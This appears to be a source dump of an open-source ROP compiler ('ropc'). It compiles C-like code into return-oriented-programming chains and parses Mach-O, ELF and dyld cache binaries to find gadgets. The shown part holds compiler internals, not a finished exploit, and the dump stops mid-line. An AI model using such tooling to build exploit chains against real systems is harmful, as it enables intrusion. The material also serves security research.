├── Build.sh ├── LICENSE ├── README ├── R_compiler.txt ├── R_syntax.bnf ├── backarm.c ├── backarm64.c ├── backend.h ├── backtxt.c ├── backx86.c ├── backx86_64.c ├── binary.c ├── binary.h ├── code.c ├── code.h ├── config.h ├── cycle.c ├── cycle.h ├── depend ├── elf.h ├── emit.c ├── emit.h ├── lexer.c ├── lexer.h ├── parser.c ├── parser.h ├── qwerty ├── payload.asm ├── payload.inc ├── rope.asm ├── rope.c └── test.c ├── ropc.c ├── sample ├── Makefile ├── Makefile.dry ├── Makefile.linux ├── Makefile.macos ├── README ├── dyld_shared_cache_arm64 ├── dyld_shared_cache_armv7 ├── dyld_shared_cache_i386 ├── dyld_shared_cache_x86_64 ├── ent.xml ├── loader.c ├── rope.c ├── rope2.c ├── rope3.c ├── rope3a.c ├── wrap-arm.asm ├── wrap-arm64.asm ├── wrap-x86.asm └── wrap-x86_64.asm ├── symtab.c ├── symtab.h ├── util.c └── util.h /Build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | function build() { 4 | gcc -o "$1" -Wall -W -pedantic -O2 -I. -g -Wno-unused-parameter -Wno-unused-function \ 5 | lexer.c \ 6 | parser.c \ 7 | cycle.c \ 8 | code.c \ 9 | emit.c \ 10 | symtab.c \ 11 | "$2" \ 12 | binary.c \ 13 | util.c \ 14 | ropc.c 15 | } 16 | 17 | if [ $# -eq 0 ]; then 18 | build ropc backend.c 19 | exit 20 | fi 21 | 22 | ARCHS=("$@") 23 | 24 | if [ "x$1" = "xall" ]; then 25 | ARCHS=(arm arm64 x86 x86_64 txt) 26 | fi 27 | 28 | for i in "${ARCHS[@]}"; do 29 | build "ropc-$i" "back$i.c" 30 | done 31 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | ROP Compiler 2 | 3 | Copyright (c) 2012 xerub 4 | 5 | This program is free software; you can redistribute it and/or modify 6 | it under the terms of the GNU General Public License as published by 7 | the Free Software Foundation; either version 2 of the License, or 8 | (at your option) any later version. 9 | 10 | This program is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | GNU General Public License for more details. 14 | 15 | You should have received a copy of the GNU General Public License 16 | along with this program. If not, see . 17 | -------------------------------------------------------------------------------- /README: -------------------------------------------------------------------------------- 1 | 1. The input is a C-like preprocessed source, the output is a NASM-like strip. 2 | dg -> define gadget, which must be slid by library slide 3 | du -> define local, which must be slid by strip slide 4 | dd -> define data (%define dd -> dq for 64bit) 5 | 6 | 2. we implement lazy assignment. that is, an assignment is not guaranteed 7 | to generate code, it only guarantees that when first using the assigned 8 | variable, it will have the desired value. however, since we do not have 9 | proper flow analysis, any assignment in a loop cannot be lazy. see 'const' 10 | 11 | 3. immediate expressions involving local pointers cannot be simplified, unless 12 | they can be reduced to: PTR + scalar. that is because there is one single 13 | final addition applied by the assembler, after full evaluation. 14 | 15 | 4. strings are treated as implicit addresses. therefore, 16 | b = "a" + 1 17 | really means: 18 | str = "a" 19 | b = &str + 1 20 | also, compound expressions are treated just like strings, with "long" 21 | values instead of characters 22 | 23 | 5. imports are implicit addresses. to actually use external variables, do 24 | *optind = 0; 25 | a = *optind; 26 | 27 | 6. sometimes, it is better to use multiple assignments for the same value 28 | fd = fd2 = open(...); 29 | read(fd, ...); 30 | close(fd2); 31 | instead of 32 | fd = open(...); 33 | read(fd, ...); 34 | close(fd); 35 | 36 | 7. this contrived load/store architecture stems from the assumptions that 37 | some rop gadgets are hard -- or impossible -- to find. for example, 38 | it is hard to load r1 without r0 39 | 40 | 8. jumping to labels in the past is tricky, because stack above us is 41 | destroyed by calls in-between. for the same reason, parameters 42 | referencing things in the past are WRONG: 43 | label: 44 | x = 1; 45 | printf("x=%x\n", x); 46 | if (modify(&x)) goto label; 47 | stack above modify is destroyed, so jumping back to label is problematic. 48 | also, any use of *(&x) is probably doomed. therefore, we need to reserve 49 | some stack space before any such calls. see '[[stack]]' 50 | 51 | ==== 52 | 53 | const: 54 | used for 55 | var = immediate 56 | to avoid generating 57 | *&var = immediate 58 | var is inlined and defined as immediate, when possible 59 | useful inside loops 60 | 61 | volatile: 62 | used for 63 | x = var 64 | to force generating 65 | x = *&var 66 | var is never inlined 67 | needed when a variable is used before and after a function call 68 | 69 | therefore 70 | "const volatile" is perfectly ok :) 71 | because the var will never be inlined, but will not generate code for assignment 72 | 73 | ==== 74 | 75 | extern function[[attr]]; 76 | a = function; 77 | a(); will not respect import attributes 78 | [[attr]]a(); will respect call attributes 79 | -------------------------------------------------------------------------------- /R_compiler.txt: -------------------------------------------------------------------------------- 1 | Part 2. The Lexer 2 | ================= 3 | 4 | The lexer recognizes C preprocessor output directives: 5 | # NUMBER "filename" 6 | #line NUMBER "filename" 7 | 8 | Keywords: 9 | if T_K_IF 10 | else T_K_ELSE 11 | do T_K_DO 12 | while T_K_WHILE 13 | break T_K_BREAK 14 | continue T_K_CONTINUE 15 | goto T_K_GOTO 16 | const T_K_CONST 17 | extern T_K_EXTERN 18 | volatile T_K_VOLATILE 19 | Regular tokens: 20 | : T_COLON 21 | ; T_SEMICOLON 22 | , T_COMMA 23 | { T_OPENCURLY 24 | } T_CLOSECURLY 25 | [ T_OPENSQUARE 26 | ] T_CLOSESQUARE 27 | ( T_OPENBRACE 28 | ) T_CLOSEBRACE 29 | = T_ASSIGN 30 | ! T_LOGICNOT 31 | + T_ADD 32 | - T_SUB 33 | * T_MUL 34 | / T_DIV 35 | | T_OR 36 | ^ T_XOR 37 | & T_AND 38 | @ T_AT 39 | Strings: 40 | "a" T_STRING 41 | Numbers: 42 | 0x1, 077, 5 T_INT 43 | 'a' T_INT 44 | Identifiers: 45 | a3, bla T_ID 46 | 47 | Adjacent strings can be merged into one single string. 48 | 49 | Part 3. The Parser 50 | ================== 51 | 52 | Will parse the source into a list of "struct the_node". 53 | struct the_node::next contains the next node in source 54 | struct the_node::edge[] contains the following nodes in execution flow 55 | struct the_node::code code to emit: a list of nodes representing statements 56 | -------------------------------------------------------------------------------- /R_syntax.bnf: -------------------------------------------------------------------------------- 1 | translation_unit : stat_or_decl_list 2 | ; 3 | stat_or_decl_list : stat_or_decl 4 | | stat_or_decl_list stat_or_decl 5 | ; 6 | stat_or_decl : stat 7 | | external_decl ';' 8 | ; 9 | external_decl : "extern" ID 10 | | "extern" ID attribute_spec 11 | | "extern" ID '=' NUMBER 12 | | "extern" ID attribute_spec '=' NUMBER 13 | ; 14 | stat : labeled_stat 15 | | ';' 16 | | '{' stat_or_decl_list '}' 17 | | jump_stat 18 | | selection_stat 19 | | assignment_exp ';' 20 | ; 21 | labeled_stat : ID ':' stat 22 | ; 23 | jump_stat : "goto" ID ';' 24 | | "break" ';' 25 | | "continue" ';' 26 | ; 27 | selection_stat : "if" conditional_exp stat 28 | | "if" conditional_exp stat "else" stat 29 | | "do" stat "while" conditional_exp ';' 30 | | "while" conditional_exp stat 31 | ; 32 | conditional_exp : '(' assignment_exp ')' 33 | | '!' '(' assignment_exp ')' 34 | ; 35 | assignment_exp : or_exp 36 | | lvalue_exp '=' assignment_exp 37 | ; 38 | or_exp : xor_exp 39 | | or_exp '&' xor_exp 40 | ; 41 | xor_exp : and_exp 42 | | xor_exp '&' and_exp 43 | ; 44 | and_exp : additive_exp 45 | | and_exp '&' additive_exp 46 | ; 47 | additive_exp : multiplicative_exp 48 | | additive_exp '+' multiplicative_exp 49 | | additive_exp '-' multiplicative_exp 50 | ; 51 | multiplicative_exp : rvalue_exp 52 | | multiplicative_exp '*' rvalue_exp 53 | | multiplicative_exp '/' rvalue_exp 54 | ; 55 | rvalue_exp : immediate_exp 56 | | lvalue_exp 57 | | ID '(' ')' 58 | | ID '(' argument_exp_list ')' 59 | | attribute_spec ID '(' ')' 60 | | attribute_spec ID '(' argument_exp_list ')' 61 | | '(' or_exp ')' 62 | ; 63 | argument_exp_list : or_exp 64 | | or_exp ',' argument_exp_list 65 | ; 66 | lvalue_exp : '*' ID 67 | | ID 68 | | type_qualifier ID 69 | ; 70 | type_qualifier : "const" | "volatile" 71 | ; 72 | immediate_exp : NUMBER 73 | | '+' NUMBER 74 | | '-' NUMBER 75 | | STRING 76 | | '@' STRING 77 | | '&' ID 78 | | '{' initializer_list '}' 79 | ; 80 | initializer_list : immediate_exp 81 | | initializer_list ',' immediate_exp 82 | ; 83 | attribute_spec : '[' '[' attribute_list ']' ']' 84 | ; 85 | attribute_list : attribute 86 | | attribute ',' attribute_list 87 | ; 88 | attribute : "noreturn" | "stdcall" | "stack" 89 | | "regparm" = NUMBER 90 | | "stack" = NUMBER 91 | ; 92 | -------------------------------------------------------------------------------- /backend.h: -------------------------------------------------------------------------------- 1 | #ifndef BACKEND_H_ 2 | #define BACKEND_H_ 3 | 4 | extern const int arch_regparm; 5 | 6 | void emit_initialize(void); 7 | void emit_finalize(void); 8 | 9 | void emit_load_direct(const char *value, BOOL deref0); 10 | void emit_load_indirect(const char *lvalue, BOOL deref0); 11 | void emit_store_indirect(const char *lvalue); 12 | void emit_store_direct(const char *lvalue); 13 | void emit_or(const char *value, const char *addend, int deref0, BOOL swap); 14 | void emit_xor(const char *value, const char *addend, int deref0, BOOL swap); 15 | void emit_and(const char *value, const char *addend, int deref0, BOOL swap); 16 | void emit_add(const char *value, const char *addend, int deref0, BOOL swap); 17 | void emit_sub(const char *value, const char *addend, int deref0); 18 | void emit_mul(const char *value, const char *multiplier, int deref0, BOOL swap); 19 | void emit_div(const char *value, const char *multiplier, int deref0); 20 | void emit_call(const char *func, char **args, int nargs, int deref0, BOOL reserve, BOOL retval, int attr, int regparm, int restack); 21 | 22 | char *emit_save(void); 23 | void emit_restore(char *scratch); 24 | 25 | void emit_goto(const char *label); 26 | void emit_cond(const char *label, enum cond_t cond); 27 | void emit_label(const char *label, int used, BOOL last); 28 | void emit_extern(const char *import, unsigned long long val, int attr, int regparm); 29 | void emit_fast(const char *var, const char *val); 30 | 31 | int backend_test_gadgets(int verbose); 32 | const char *backend_name(void); 33 | 34 | #endif 35 | -------------------------------------------------------------------------------- /backtxt.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "config.h" 7 | #include "util.h" 8 | #include "code.h" 9 | #include "backend.h" 10 | #include "binary.h" 11 | #include "symtab.h" 12 | 13 | 14 | const int arch_regparm = 4; 15 | 16 | 17 | static uint64_t 18 | solve_import(const char *p) 19 | { 20 | if (binmap) { 21 | uint64_t rv; 22 | char *tmp = prepend('_', p); 23 | rv = parse_symbols(binmap, tmp); 24 | free(tmp); 25 | if (!rv) { 26 | die("undefined import '%s'\n", p); 27 | } 28 | return rv; 29 | } 30 | return hash(p); 31 | } 32 | 33 | 34 | static void 35 | load_value(int i, int ch, const char *arg) 36 | { 37 | if (arg) { 38 | const struct SYM *p; 39 | if (is_address(arg)) { 40 | char *na = curate_address(arg); 41 | printx(" %c%d = &%s\n", ch, i, na); 42 | free(na); 43 | return; 44 | } 45 | p = get_symbol(arg); 46 | if (p) { 47 | if (p->type == SYMBOL_EXTERN) { 48 | printx(" %c%d = %-22s // extern: 0x%llx\n", ch, i, arg, p->addr); 49 | } else if (p->type == SYMBOL_LABEL) { 50 | printx(" %c%d = &%-21s // label\n", ch, i, p->key); 51 | } else { 52 | assert(p->type == SYMBOL_NORMAL); 53 | if (p->val && is_address(p->val)) { 54 | char *na = curate_address(p->val); 55 | printx(" %c%d = %-22s // = &%s\n", ch, i, arg, na); 56 | free(na); 57 | } else if (p->val && try_symbol_extern(p->val)) { 58 | printx(" %c%d = %-22s // = %s (extern: 0x%llx)\n", ch, i, arg, p->val, get_symbol(p->val)->addr); 59 | } else { 60 | printx(" %c%d = %-22s // = %s\n", ch, i, arg, p->val ? p->val : "0"); 61 | } 62 | } 63 | return; 64 | } 65 | } 66 | printx(" %c%d = %s\n", ch, i, arg ? arg : "0"); 67 | } 68 | 69 | 70 | void 71 | emit_finalize(void) 72 | { 73 | } 74 | 75 | 76 | void 77 | emit_load_direct(const char *value, BOOL deref0) 78 | { 79 | load_value(0, 'r', value); 80 | if (deref0) { 81 | printx(" r0 = *r0\n"); 82 | } 83 | } 84 | 85 | 86 | void 87 | emit_load_indirect(const char *lvalue, BOOL deref0) 88 | { 89 | char *tmp = create_address_str(lvalue, 0); 90 | load_value(0, 'r', tmp); 91 | printx(" r0 = *r0\n"); 92 | if (deref0) { 93 | printx(" r0 = *r0\n"); 94 | } 95 | free(tmp); 96 | } 97 | 98 | 99 | void 100 | emit_store_indirect(const char *lvalue) 101 | { 102 | char *tmp = create_address_str(lvalue, 0); 103 | load_value(4, 'r', tmp); 104 | printx(" *r4 = r0\n"); 105 | free(tmp); 106 | } 107 | 108 | 109 | void 110 | emit_store_direct(const char *lvalue) 111 | { 112 | load_value(4, 'r', lvalue); 113 | printx(" *r4 = r0\n"); 114 | } 115 | 116 | 117 | void 118 | emit_or(const char *value, const char *addend, int deref0, BOOL swap) 119 | { 120 | SWAP_PTR(swap, value, addend); 121 | load_value(1, 'r', addend); 122 | load_value(0, 'r', value); 123 | while (deref0--) { 124 | printx(" r0 = *r0\n"); 125 | } 126 | printx(" r0 |= r1\n"); 127 | } 128 | 129 | 130 | void 131 | emit_xor(const char *value, const char *addend, int deref0, BOOL swap) 132 | { 133 | SWAP_PTR(swap, value, addend); 134 | load_value(1, 'r', addend); 135 | load_value(0, 'r', value); 136 | while (deref0--) { 137 | printx(" r0 = *r0\n"); 138 | } 139 | printx(" r0 ^= r1\n"); 140 | } 141 | 142 | 143 | void 144 | emit_and(const char *value, const char *addend, int deref0, BOOL swap) 145 | { 146 | SWAP_PTR(swap, value, addend); 147 | load_value(1, 'r', addend); 148 | load_value(0, 'r', value); 149 | while (deref0--) { 150 | printx(" r0 = *r0\n"); 151 | } 152 | printx(" r0 &= r1\n"); 153 | } 154 | 155 | 156 | void 157 | emit_add(const char *value, const char *addend, int deref0, BOOL swap) 158 | { 159 | SWAP_PTR(swap, value, addend); 160 | load_value(1, 'r', addend); 161 | load_value(0, 'r', value); 162 | while (deref0--) { 163 | printx(" r0 = *r0\n"); 164 | } 165 | printx(" r0 += r1\n"); 166 | } 167 | 168 | 169 | void 170 | emit_sub(const char *value, const char *addend, int deref0) 171 | { 172 | load_value(1, 'r', addend); 173 | load_value(0, 'r', value); 174 | while (deref0--) { 175 | printx(" r0 = *r0\n"); 176 | } 177 | printx(" r0 -= r1\n"); 178 | } 179 | 180 | 181 | void 182 | emit_mul(const char *value, const char *multiplier, int deref0, BOOL swap) 183 | { 184 | SWAP_PTR(swap, value, multiplier); 185 | load_value(1, 'r', multiplier); 186 | load_value(0, 'r', value); 187 | while (deref0--) { 188 | printx(" r0 = *r0\n"); 189 | } 190 | printx(" r0 *= r1\n"); 191 | } 192 | 193 | 194 | void 195 | emit_div(const char *value, const char *multiplier, int deref0) 196 | { 197 | load_value(1, 'r', multiplier); 198 | load_value(0, 'r', value); 199 | while (deref0--) { 200 | printx(" r0 = *r0\n"); 201 | } 202 | printx(" r0 /= r1\n"); 203 | } 204 | 205 | 206 | void 207 | emit_call(const char *func, char **args, int nargs, int deref0, BOOL inloop, BOOL retval, int attr, int regparm, int restack) 208 | { 209 | char *tmp = NULL; 210 | int rargs = nargs; 211 | if (args == NULL) { 212 | rargs = nargs = 0; 213 | } 214 | if (rargs > regparm) { 215 | rargs = regparm; 216 | } 217 | if (rargs) { 218 | assert(rargs <= 4); 219 | switch (rargs) { 220 | case 4: 221 | load_value(3, 'r', args[3]); 222 | case 3: 223 | load_value(2, 'r', args[2]); 224 | case 2: 225 | load_value(1, 'r', args[1]); 226 | case 1: 227 | load_value(0, 'r', args[0]); 228 | } 229 | } 230 | while (deref0--) { 231 | printx(" r0 = *r0\n"); 232 | } 233 | if (attr & ATTRIB_NORETURN) { 234 | if (nargs > rargs) { 235 | printx(" %s{%d}\n", func, nargs - rargs); 236 | } else { 237 | printx(" %s\n", func); 238 | } 239 | for (; rargs < nargs; rargs++) { 240 | load_value(rargs - regparm, 'a', args[rargs]); 241 | } 242 | return; 243 | } 244 | load_value(4, 'r', func); 245 | if ((attr & ATTRIB_STACK) || inloop) { 246 | printx(" stack 0x%x\n", (restack > 0) ? restack : inloop_stack); 247 | } 248 | if (inloop) { 249 | tmp = new_name("res"); 250 | add_label(tmp, 0xdead); 251 | printx("%s:\n", tmp); 252 | } 253 | if (!(attr & ATTRIB_STDCALL) && nargs > rargs) { 254 | printx(" call r4{%d}\n", nargs - rargs); 255 | } else { 256 | printx(" call r4\n"); 257 | } 258 | for (; rargs < nargs; rargs++) { 259 | load_value(rargs - regparm, 'a', args[rargs]); 260 | } 261 | if (inloop) { 262 | char *sav; 263 | char *gdg = new_name("gdg"); 264 | if (retval) { 265 | sav = emit_save(); 266 | } 267 | add_extern(gdg, 0xca11, 0, -1); 268 | make_symbol_used(gdg); 269 | emit_load_direct(gdg, FALSE); 270 | emit_store_indirect(tmp); 271 | if (retval) { 272 | emit_restore(sav); 273 | } 274 | free(gdg); 275 | } 276 | free(tmp); 277 | } 278 | 279 | 280 | char * 281 | emit_save(void) 282 | { 283 | #ifdef SLOW_LOAD_SAVE 284 | char *scratch = new_name("tmp"); 285 | add_symbol_forward(scratch, 0); 286 | emit_store_indirect(scratch); 287 | return scratch; 288 | #else 289 | printx(" r1 = r0\n"); 290 | return NULL; 291 | #endif 292 | } 293 | 294 | 295 | void 296 | emit_restore(char *scratch) 297 | { 298 | #ifdef SLOW_LOAD_SAVE 299 | assert(scratch); 300 | emit_load_direct(scratch, FALSE); 301 | make_symbol_used(scratch); 302 | free(scratch); 303 | #else 304 | printx(" r0 = r1\n"); 305 | (void)scratch; 306 | #endif 307 | } 308 | 309 | 310 | void 311 | emit_goto(const char *label) 312 | { 313 | printx(" goto %s\n", label); 314 | } 315 | 316 | 317 | void 318 | emit_cond(const char *label, enum cond_t cond) 319 | { 320 | BOOL inverse = (cond == COND_EQ); 321 | assert(cond == COND_NE || cond == COND_EQ); 322 | printx(" if %s(r0) goto %s\n", inverse ? "!" : "", label); 323 | } 324 | 325 | 326 | void 327 | emit_label(const char *label, int used, BOOL last) 328 | { 329 | add_label(label, 0x1abe1); 330 | if (!used) { 331 | printx("%s:\n", label); 332 | cry("unused label '%s'\n", label); 333 | } else if (last) { 334 | printx("%s:\n", label); 335 | } else { 336 | printx("%s:\n", label); 337 | } 338 | } 339 | 340 | 341 | void 342 | emit_extern(const char *import, unsigned long long val, int attr, int regparm) 343 | { 344 | /* should not emit anything, but add symbol as extern */ 345 | printx(";;; extern %s\n", import); 346 | add_extern(import, (val != -1ULL) ? val : solve_import(import), attr, regparm); 347 | } 348 | 349 | 350 | void 351 | emit_fast(const char *var, const char *val) 352 | { 353 | /* should not emit anything, this is for informative purposes only */ 354 | printx(";;; %s := %s\n", var, val); 355 | } 356 | 357 | 358 | void 359 | emit_initialize(void) 360 | { 361 | } 362 | 363 | 364 | int 365 | backend_test_gadgets(int verbose) 366 | { 367 | return 0; 368 | } 369 | 370 | 371 | const char * 372 | backend_name(void) 373 | { 374 | return "text"; 375 | } 376 | -------------------------------------------------------------------------------- /binary.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #include 9 | #include 10 | #include 11 | 12 | #include 13 | #include 14 | 15 | #include "elf.h" 16 | #include "binary.h" 17 | 18 | 19 | #define printf(...) 20 | 21 | 22 | /* cache */ 23 | 24 | 25 | struct dyld_cache_header { 26 | char magic[16]; /* e.g. "dyld_v0 ppc" */ 27 | uint32_t mappingOffset; /* file offset to first dyld_cache_mapping_info */ 28 | uint32_t mappingCount; /* number of dyld_cache_mapping_info entries */ 29 | uint32_t imagesOffset; /* file offset to first dyld_cache_image_info */ 30 | uint32_t imagesCount; /* number of dyld_cache_image_info entries */ 31 | uint64_t dyldBaseAddress; /* base address of dyld when cache was built */ 32 | uint64_t codeSignatureOffset; /* file offset in of code signature blob */ 33 | uint64_t codeSignatureSize; /* size of code signature blob (zero means to end of file) */ 34 | }; 35 | 36 | struct dyld_cache_mapping_info { 37 | uint64_t address; 38 | uint64_t size; 39 | uint64_t fileOffset; 40 | uint32_t maxProt; 41 | uint32_t initProt; 42 | }; 43 | 44 | struct dyld_cache_image_info { 45 | uint64_t address; 46 | uint64_t modTime; 47 | uint64_t inode; 48 | uint32_t pathFileOffset; 49 | uint32_t pad; 50 | }; 51 | 52 | 53 | static uint32_t 54 | find_mapping(uint32_t mappingCount, const struct dyld_cache_mapping_info map[], uint64_t address) 55 | { 56 | uint32_t j, pos; 57 | uint64_t max = 0; 58 | for (pos = -1, j = 0; j < mappingCount; j++) { 59 | if (map[j].address <= address) { 60 | if (max < map[j].address) { 61 | max = map[j].address; 62 | pos = j; 63 | } 64 | } 65 | } 66 | return pos; 67 | } 68 | 69 | 70 | /* ranges */ 71 | 72 | 73 | struct range { 74 | struct range *next; 75 | uint64_t offset; 76 | uint64_t vmaddr; 77 | uint32_t filesize; 78 | }; 79 | 80 | 81 | unsigned long gadget_limit = -1; 82 | 83 | 84 | static struct range * 85 | add_range(struct range *ranges, uint64_t offset, uint64_t vmaddr, uint32_t filesize) 86 | { 87 | struct range *r; 88 | if (offset >= gadget_limit) { 89 | return ranges; 90 | } 91 | if (offset + filesize > gadget_limit) { 92 | filesize = gadget_limit - offset; 93 | } 94 | for (r = ranges; r; r = r->next) { 95 | if (r->vmaddr == vmaddr) { 96 | return ranges; 97 | } 98 | } 99 | r = malloc(sizeof(struct range)); 100 | assert(r); 101 | r->offset = offset; 102 | r->vmaddr = vmaddr; 103 | r->filesize = filesize; 104 | r->next = ranges; 105 | return r; 106 | } 107 | 108 | 109 | void 110 | delete_ranges(struct range *ranges) 111 | { 112 | struct range *r; 113 | for (r = ranges; r; ) { 114 | struct range *q = r->next; 115 | free(r); 116 | r = q; 117 | } 118 | } 119 | 120 | 121 | static void * 122 | reverse_list(void *n) 123 | { 124 | struct range *prev = NULL; 125 | struct range *node = n; 126 | while (node) { 127 | struct range *next = node->next; 128 | node->next = prev; 129 | prev = node; 130 | node = next; 131 | } 132 | return prev; 133 | } 134 | 135 | 136 | static struct range * 137 | parse_macho_ranges(const unsigned char *p, struct range *ranges) 138 | { 139 | unsigned int i; 140 | const struct mach_header *hdr = (struct mach_header *)p; 141 | char *q; 142 | 143 | int is64 = (hdr->magic & 1) * 4; 144 | 145 | if ((hdr->magic & ~1) != 0xfeedface) { 146 | return ranges; 147 | } 148 | 149 | q = (char *)(p + sizeof(struct mach_header) + is64); 150 | for (i = 0; i < hdr->ncmds; i++) { 151 | const struct load_command *cmd = (struct load_command *)q; 152 | uint32_t c = cmd->cmd; 153 | if (c == LC_SEGMENT) { 154 | const struct segment_command *seg = (struct segment_command *)q; 155 | if (seg->initprot & 4) { 156 | ranges = add_range(ranges, seg->fileoff, seg->vmaddr, seg->filesize); 157 | } 158 | } 159 | if (c == LC_SEGMENT_64) { 160 | const struct segment_command_64 *seg = (struct segment_command_64 *)q; 161 | if (seg->initprot & 4) { 162 | ranges = add_range(ranges, seg->fileoff, seg->vmaddr, seg->filesize); 163 | } 164 | } 165 | q = q + cmd->cmdsize; 166 | } 167 | 168 | return ranges; 169 | } 170 | 171 | 172 | #ifdef FILTER_DYLIBS 173 | static const char *filter_dylib[] = { 174 | "/usr/lib/libSystem.B.dylib", 175 | "/usr/lib/system/libcache.dylib", 176 | "/usr/lib/system/libcommonCrypto.dylib", 177 | "/usr/lib/system/libcompiler_rt.dylib", 178 | "/usr/lib/system/libcopyfile.dylib", 179 | "/usr/lib/system/libcorecrypto.dylib", 180 | "/usr/lib/system/libdispatch.dylib", 181 | "/usr/lib/system/libdyld.dylib", 182 | "/usr/lib/system/libkeymgr.dylib", 183 | "/usr/lib/system/liblaunch.dylib", 184 | "/usr/lib/system/libmacho.dylib", 185 | "/usr/lib/system/libquarantine.dylib", 186 | "/usr/lib/system/libremovefile.dylib", 187 | "/usr/lib/system/libsystem_asl.dylib", 188 | "/usr/lib/system/libsystem_blocks.dylib", 189 | "/usr/lib/system/libsystem_c.dylib", 190 | "/usr/lib/system/libsystem_configuration.dylib", 191 | "/usr/lib/system/libsystem_coreservices.dylib", 192 | "/usr/lib/system/libsystem_darwin.dylib", 193 | "/usr/lib/system/libsystem_dnssd.dylib", 194 | "/usr/lib/system/libsystem_info.dylib", 195 | "/usr/lib/system/libsystem_m.dylib", 196 | "/usr/lib/system/libsystem_malloc.dylib", 197 | "/usr/lib/system/libsystem_networkextension.dylib", 198 | "/usr/lib/system/libsystem_notify.dylib", 199 | "/usr/lib/system/libsystem_sandbox.dylib", 200 | "/usr/lib/system/libsystem_secinit.dylib", 201 | "/usr/lib/system/libsystem_kernel.dylib", 202 | "/usr/lib/system/libsystem_platform.dylib", 203 | "/usr/lib/system/libsystem_pthread.dylib", 204 | "/usr/lib/system/libsystem_symptoms.dylib", 205 | "/usr/lib/system/libsystem_trace.dylib", 206 | "/usr/lib/system/libunwind.dylib", 207 | "/usr/lib/system/libxpc.dylib", 208 | "/usr/lib/libobjc.A.dylib", 209 | "/usr/lib/libc++abi.dylib", 210 | "/usr/lib/libc++.1.dylib", 211 | NULL 212 | }; 213 | #endif 214 | 215 | 216 | static struct range * 217 | parse_cache_ranges(const unsigned char *p, struct range *ranges) 218 | { 219 | unsigned i; 220 | const struct dyld_cache_header *hdr = (struct dyld_cache_header *)p; 221 | const struct dyld_cache_mapping_info *map = (struct dyld_cache_mapping_info *)(p + hdr->mappingOffset); 222 | #ifdef FILTER_DYLIBS 223 | const struct dyld_cache_image_info *img = (struct dyld_cache_image_info *)(p + hdr->imagesOffset); 224 | for (i = 0; i < hdr->imagesCount; i++) { 225 | unsigned k; 226 | for (k = 0; filter_dylib[k]; k++) { 227 | if (!strcmp((char *)p + img[i].pathFileOffset, filter_dylib[k])) { 228 | uint64_t address = img[i].address; 229 | int j = find_mapping(hdr->mappingCount, map, address); 230 | if (j != -1) { 231 | ranges = parse_macho_ranges(p + address - map[j].address + map[j].fileOffset, ranges); 232 | } 233 | break; 234 | } 235 | } 236 | } 237 | #else 238 | for (i = 0; i < hdr->mappingCount; i++) { 239 | if (map[i].initProt & 4) { 240 | ranges = add_range(ranges, map[i].fileOffset, map[i].address, map[i].size); 241 | } 242 | } 243 | #endif 244 | return ranges; 245 | } 246 | 247 | 248 | static struct range * 249 | parse_elf32_ranges(const unsigned char *p, struct range *ranges) 250 | { 251 | unsigned i; 252 | const Elf32_Ehdr *hdr = (Elf32_Ehdr *)p; 253 | const Elf32_Phdr *phdr = (Elf32_Phdr *)(p + hdr->e_phoff); 254 | 255 | for (i = 0; i < hdr->e_phnum; i++) { 256 | if (phdr->p_type == PT_LOAD) { 257 | if (phdr->p_flags & PF_X) { 258 | ranges = add_range(ranges, phdr->p_offset, phdr->p_vaddr, phdr->p_filesz); 259 | } 260 | } 261 | phdr++; 262 | } 263 | 264 | return ranges; 265 | } 266 | 267 | static struct range * 268 | parse_elf64_ranges(const unsigned char *p, struct range *ranges) 269 | { 270 | unsigned i; 271 | const Elf64_Ehdr *hdr = (Elf64_Ehdr *)p; 272 | const Elf64_Phdr *phdr = (Elf64_Phdr *)(p + hdr->e_phoff); 273 | 274 | for (i = 0; i < hdr->e_phnum; i++) { 275 | if (phdr->p_type == PT_LOAD) { 276 | if (phdr->p_flags & PF_X) { 277 | ranges = add_range(ranges, phdr->p_offset, phdr->p_vaddr, phdr->p_filesz); 278 | } 279 | } 280 | phdr++; 281 | } 282 | 283 | return ranges; 284 | } 285 | 286 | 287 | struct range * 288 | parse_ranges(const unsigned char *p, size_t sz) 289 | { 290 | struct range *ranges; 291 | if (!strncmp((char *)p, "dyld_v1 ", 8)) { 292 | ranges = parse_cache_ranges(p, NULL); 293 | } else if ((*(unsigned *)p & ~1) == 0xfeedface) { 294 | ranges = parse_macho_ranges(p, NULL); 295 | } else if (!memcmp(p, "\177ELF\001", 5)) { 296 | ranges = parse_elf32_ranges(p, NULL); 297 | } else if (!memcmp(p, "\177ELF\002", 5)) { 298 | ranges = parse_elf64_ranges(p, NULL); 299 | } else { 300 | ranges = add_range(NULL, 0, 0, sz); 301 | } 302 | return reverse_list(ranges); 303 | } 304 | 305 | 306 | /* symbols */ 307 | 308 | 309 | static uint64_t 310 | parse_macho_symbols(const unsigned char *p, uint64_t address, const char *key) 311 | { 312 | unsigned int i; 313 | const struct mach_header *hdr = (struct mach_header *)(p + address); 314 | char *q; 315 | 316 | uint32_t stroff = 0; 317 | uint32_t symoff = 0; 318 | int iextdefsym = -1; 319 | int nextdefsym = -1; 320 | 321 | int is64 = (hdr->magic & 1) * 4; 322 | 323 | if ((hdr->magic & ~1) != 0xfeedface) { 324 | return 0; 325 | } 326 | 327 | q = (char *)(p + address + sizeof(struct mach_header) + is64); 328 | for (i = 0; i < hdr->ncmds; i++) { 329 | const struct load_command *cmd = (struct load_command *)q; 330 | uint32_t c = cmd->cmd; 331 | if (c == LC_SYMTAB) { 332 | struct symtab_command *sym = (struct symtab_command *)q; 333 | symoff = sym->symoff; 334 | stroff = sym->stroff; 335 | } else if (c == LC_DYSYMTAB) { 336 | struct dysymtab_command *sym = (struct dysymtab_command *)q; 337 | iextdefsym = sym->iextdefsym; 338 | nextdefsym = sym->nextdefsym; 339 | } 340 | q = q + cmd->cmdsize; 341 | } 342 | 343 | assert(symoff && stroff && iextdefsym >= 0 && nextdefsym >= 0); 344 | 345 | if (is64) { 346 | const struct nlist_64 *base = NULL; 347 | for (base = (struct nlist_64 *)(p + symoff) + iextdefsym; nextdefsym > 0; nextdefsym /= 2) { 348 | const struct nlist_64 *pivot = &base[nextdefsym / 